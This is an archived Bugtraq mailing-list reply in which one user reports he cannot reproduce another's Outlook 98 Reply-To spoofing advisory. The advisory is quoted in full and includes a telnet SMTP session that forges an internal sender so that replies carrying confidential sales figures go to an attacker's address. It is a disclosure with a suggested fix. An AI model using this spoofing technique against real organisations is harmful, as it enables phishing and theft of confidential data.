Hi Nate,
I was not able to reproduce the exploit that you reported to the
bugtraq mailing list. Outlook98 did exactly what I expected: when I
open the mail, I see the "From:"-header in the message. When I reply
to the email, Outlook takes the "Reply-To:"-address of the
header. Which version of Outlook did you test?
Best Regards, Sebastian
PS: your "quick script" has a little bug: the header entry should be
"Reply-To:" instead of "Reply To:".
Nate Lawson <nateat_private> wrote:
> Problem: Outlook uses a sender's Reply-To address silently, allowing
> a user to inadvertently send data to an Internet mail account
> when intending to reply to an internal, trusted user.
>
> Impact: Anyone on the Internet can spoof a trusted internal Exchange user
> and get replies sent back to themself without the user knowing they
> weren't responding to another internal user.
>
> How to reproduce:
>
> 1. Spoof mail as an internal user with a Reply-To address claiming to be
> an internal user, but an address of an Internet account, say hotmail.
> 2. Go into Outlook and read the mail. The mail looks like it was internally
> generated but viewing the full Internet headers under View->Options
> shows the bogus Reply-To header.
> 3. Hit Reply in Outlook. The To: field looks like it's going to a valid
> internal user, but right clicking on it and choosing Properties shows
> that the internal user it is sending the reply to is actually an Internet
> address.
> 4. Enter some text and hit Send. Observe that the mail went to the attacker's
> account, not the internal one.
>
> A quick script:
>
> {root 5:00pm} ~> telnet mail.example.com 25
> Trying 10.20.2.5...
> Connected to mail.example.com.
> Escape character is '^]'.
> 220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready
> helo losebag
> 250 OK
> mail from:<>
> 250 OK - mail from <>
> rcpt to:<accountingat_private>
> 250 OK - Recipient <accountingat_private>
> data
> 354 Send data. End with CRLF.CRLF
> From: Nate Lawson
> To: Accounting
> Reply To: Nate Lawson<intruderat_private>
> Subject: important!
>
> Please reply with the latest copy of our sales figures!
>
> Thanks,
> Nate
> .
> 250 OK
> quit
> 221 closing connection
> Connection closed by foreign host.
>
> Now, a reply to the email will go not to the trusted internal user Nate
> Lawson <nlawsonat_private> but to the attacker, <intruderat_private>.
> Worse, the user sees no indication that the mail is outward-bound! The
> To: field on the reply simply shows "Nate Lawson", a valid internal user.
>
> Affected programs: Only tested on Outlook 98
>
> Known use of this bug to get confidential information: none yet
>
> Suggested Fix: always show the full email address of any recipient that is
> not local (i.e. usernameat_private would be hidden but any instance of
> userat_private would be shown)
>
> Microsoft has been notified, but claimed this was a weakness in SMTP and
> would not be fixed until a secure successor to SMTP is implemented. They
> obviouly missed the point -- the error is not in that mail can be forged,
> but that Outlook allows a user to respond to a message that looks local
> and legitimate, but is actually destined for an outside address.
>
> -Nate
--
-- What's a letter? Is it like E-mail? ((o)(o))
|---------------------------------------------------ooOo-( )-oOoo-|
| Sebastian Schreiber, Burgholzweg 36, 72070 Tübingen ( ) |
| Germany, Voice: ++49 (0)7071 49570 ( ) |
| GSM: 0049-173-3502725 (..) |
|------------------------------------------------------------------|
Key fingerprint = 3F F5 D5 E0 0A 59 A5 C4 E7 4F 2B EA 7D 83 89 98
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:44:40 PDT